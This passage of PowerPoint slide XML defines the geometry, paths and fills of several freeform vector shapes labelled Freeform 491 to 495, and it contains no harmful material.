                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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410" name="Freeform 491"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1446212" y="6499225"/>
            <a:ext cx="298450" cy="80963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 132"/>
              <a:gd name="T1" fmla="*/ 0 h 36"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 0 h 36"/>
              <a:gd name="T8" fmla="*/ 0 w 132"/>
              <a:gd name="T9" fmla="*/ 0 h 36"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 132"/>
              <a:gd name="T16" fmla="*/ 0 h 36"/>
              <a:gd name="T17" fmla="*/ 132 w 132"/>
              <a:gd name="T18" fmla="*/ 36 h 36"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="132" h="36">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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411" name="Freeform 492"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="6505575"/>
            <a:ext cx="300038" cy="87313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 133"/>
              <a:gd name="T1" fmla="*/ 0 h 38"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T7" fmla="*/ 0 h 38"/>
              <a:gd name="T8" fmla="*/ 0 w 133"/>
              <a:gd name="T9" fmla="*/ 0 h 38"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 133"/>
              <a:gd name="T16" fmla="*/ 0 h 38"/>
              <a:gd name="T17" fmla="*/ 133 w 133"/>
              <a:gd name="T18" fmla="*/ 38 h 38"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="133" h="38">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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412" name="Freeform 493"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690812" y="6311900"/>
            <a:ext cx="561975" cy="471488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T27" fmla="*/ 0 h 209"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T29" fmla="*/ 0 h 209"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T31" fmla="*/ 0 h 209"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T33" fmla="*/ 0 h 209"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T56" fmla="*/ 0 w 249"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 20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49"/>
              <a:gd name="T118" fmla="*/ 0 h 209"/>
              <a:gd name="T119" fmla="*/ 249 w 249"/>
              <a:gd name="T120" fmla="*/ 209 h 20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49" h="209">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="27"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10413" name="Freeform 494"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2884487" y="6345238"/>
            <a:ext cx="180975" cy="207962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T17" fmla="*/ 0 h 92"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T19" fmla="*/ 0 h 92"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T40" fmla="*/ 0 w 80"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T42" fmla="*/ 0 w 80"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T44" fmla="*/ 0 w 80"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 92"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 80"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 9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0"/>
              <a:gd name="T148" fmla="*/ 0 h 92"/>
              <a:gd name="T149" fmla="*/ 80 w 80"/>
              <a:gd name="T150" fmla="*/ 92 h 9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0" h="92">
                <a:moveTo>
                  <a:pt x="79" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="79" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10414" name="Freeform 495"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2905125" y="6403975"/>
            <a:ext cx="295275" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 0 w 131"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
